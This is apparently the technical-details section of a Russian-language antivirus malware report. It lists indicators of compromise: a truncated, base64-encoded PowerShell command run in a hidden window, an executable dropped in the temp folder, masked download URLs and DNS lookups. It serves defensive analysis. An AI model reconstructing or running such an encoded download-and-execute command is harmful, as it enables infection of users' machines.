Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAE4AZQB3AC0ATwBiAEoARQBjAFQAIABpAG8ALgBDAG8ATQBwAHIAZQBTAHMAaQBvAG4ALgBEAEUAZgBsAGEAdABFAFMAdABSAEUAQQBNACgAIABbAFMAeQBzAFQARQBNAC4ASQBvAC4ATQBlAG0ATwBSAHkAcwBUAHIARQBBAE0AXQAgAFsAUwBZAH...
- %TEMP%\55192.exe
- %TEMP%\55192.exe
- 'kw###ling.com':80
- 'th###ffice.me':80
- 'th###ffice.me':443
- 'ad######ster-volunteer.com':80
- 'ad######ster-volunteer.com':443
- http://kw###ling.com/k277/
- http://www.th###ffice.me/XVVkry/
- http://www.ad######ster-volunteer.com/jOAZ7pB/
- 'th###ffice.me':443
- 'ad######ster-volunteer.com':443
- DNS ASK kw###ling.com
- DNS ASK ar###and.com
- DNS ASK th###ffice.me
- DNS ASK um#o.tv
- DNS ASK ad######ster-volunteer.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAE4AZQB3AC0ATwBiAEoARQBjAFQAIABpAG8ALgBDAG8ATQBwAHIAZQBTAHMAaQBvAG4ALgBEAEUAZgBsAGEAdABFAFMAdABSAEUAQQBNACgAIABbAFMAeQBzAFQARQBNAC4ASQBvAC4ATQBlAG0ATwBSAHkAcwBUAHIARQBBAE0AXQAgAFsAUwBZAH...' (со скрытым окном)